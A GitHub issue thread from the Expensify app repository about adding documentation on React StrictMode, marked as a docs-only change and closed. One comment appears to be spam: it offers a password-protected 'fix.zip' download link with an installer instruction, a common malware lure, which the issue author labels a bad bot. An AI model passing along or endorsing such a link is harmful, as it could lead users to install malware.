### ISSUE TITLE
[NO QA] Improve documentation around React StrictMode

### ISSUE THREAD

**Issue by Kicu** [Expensify/App#48158]
Coming from this long discussion in slack: https://swmansion.slack.com/archives/C05LX9D6E07/p1724834166631849?thread_ts=1722970682.900369&cid=C05LX9D6E07

It seems that our usage of `StrictMode` is still confusing to developers and we do not have a lot of comments or docs written about this.
I will update some of our readmes to write most important points and drop some links for further reading.

This will be only a doc update, no code logic changes intended.

## Action Performed:
N/A

## Expected Result:
N/A

## Actual Result:
N/A

## Workaround:
N/A

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Kicu** [comment]
@chenshupe bad bot

**Comment by Kicu** [comment]
I believe this issue can be closed. This was only a docs change, no changes to app, no QA or testing required, and no C+ was involved with reviewing.

If I forgot about something then please comment and/or reopen.
CC @mountiny
